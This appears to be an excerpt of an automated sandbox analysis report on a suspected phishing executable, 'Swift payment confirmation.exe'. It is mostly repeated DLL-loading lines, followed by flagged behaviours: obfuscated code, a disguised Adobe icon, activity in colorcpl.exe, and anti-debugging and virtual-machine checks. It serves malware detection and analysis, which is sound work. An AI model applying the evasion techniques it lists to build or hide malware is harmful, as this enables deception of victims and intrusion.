            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\SysWOW64\colorcpl.exe Window found: window name: SysTabControl32
            Source: C:\Windows\SysWOW64\colorcpl.exe Window detected: Number of UI elements: 12
            Source: Binary string: easinvoker.pdb source: Swift payment confirmation.exe, Swift payment confirmation.exe, 00000000.00000002.2174249610.00000000032DE000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042668817.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2041882325.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 00000002.00000003.2252350083.0000000004C3C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000003.2255245800.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.0000000026760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.00000000268FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 00000002.00000003.2252350083.0000000004C3C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000003.2255245800.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.0000000026760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.00000000268FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdbGCTL source: Swift payment confirmation.exe, 00000000.00000002.2174249610.00000000032DE000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2173823942.0000000003211000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042668817.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042440140.0000000002FDB000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2041882325.000000007FE00000.00000004.00001000.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara matchFile source: 0.2.Swift payment confirmation.exe.32b0000.0.unpack, type: UNPACKEDPE
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_032C894C
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B332C push eax; ret 0_2_032B3368
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032DC378 push 032DC56Eh; ret 0_2_032DC566
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032BC349 push 8B032BC1h; ret 0_2_032BC34E
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B63AE push 032B640Bh; ret 0_2_032B6403
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B63B0 push 032B640Bh; ret 0_2_032B6403
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032DD2FC push 032DD367h; ret 0_2_032DD35F
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CF108 push ecx; mov dword ptr [esp], edx0_2_032CF10D
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032DD144 push 032DD1ECh; ret 0_2_032DD1E4
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032DD1F8 push 032DD288h; ret 0_2_032DD280
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C306C push 032C30B9h; ret 0_2_032C30B1
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C306B push 032C30B9h; ret 0_2_032C30B1
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032DD0AC push 032DD125h; ret 0_2_032DD11D
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B6782 push 032B67C6h; ret 0_2_032B67BE
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B6784 push 032B67C6h; ret 0_2_032B67BE
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032BC56C push ecx; mov dword ptr [esp], edx0_2_032BC571
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032DC570 push 032DC56Eh; ret 0_2_032DC566
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032BD5A0 push 032BD5CCh; ret 0_2_032BD5C4
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032BCBEC push 032BCD72h; ret 0_2_032BCD6A
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_03324A50 push eax; ret 0_2_03324B20
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032BCA4E push 032BCD72h; ret 0_2_032BCD6A
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CAAE0 push 032CAB18h; ret 0_2_032CAB10
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CAADF push 032CAB18h; ret 0_2_032CAB10
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C8AD8 push 032C8B10h; ret 0_2_032C8B08
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C790C push 032C7989h; ret 0_2_032C7981
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C6948 push 032C69F3h; ret 0_2_032C69EB
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C6946 push 032C69F3h; ret 0_2_032C69EB
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C886C push 032C88AEh; ret 0_2_032C88A6
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C2F60 push 032C2FD6h; ret 0_2_032C2FCE
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C5E7C push ecx; mov dword ptr [esp], edx0_2_032C5E7E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_06442F80 push eax; ret 2_2_06442F82
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_06446C76 pushad ; ret 2_2_06446C77

            Hooking and other Techniques for Hiding and Protection

            Source: initial sample Icon embedded in binary file: icon matches a legit application icon: adobe 12.png
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_032CAB1C
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D096E rdtsc 2_2_267D096E
            Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 0.6 %
            Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1288 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_032B5908
            Source: Swift payment confirmation.exe, 00000000.00000002.2171637621.000000000087D000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.000000000081E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe API call chain: ExitProcess graph end node graph_0-32635
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_032CF744
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort
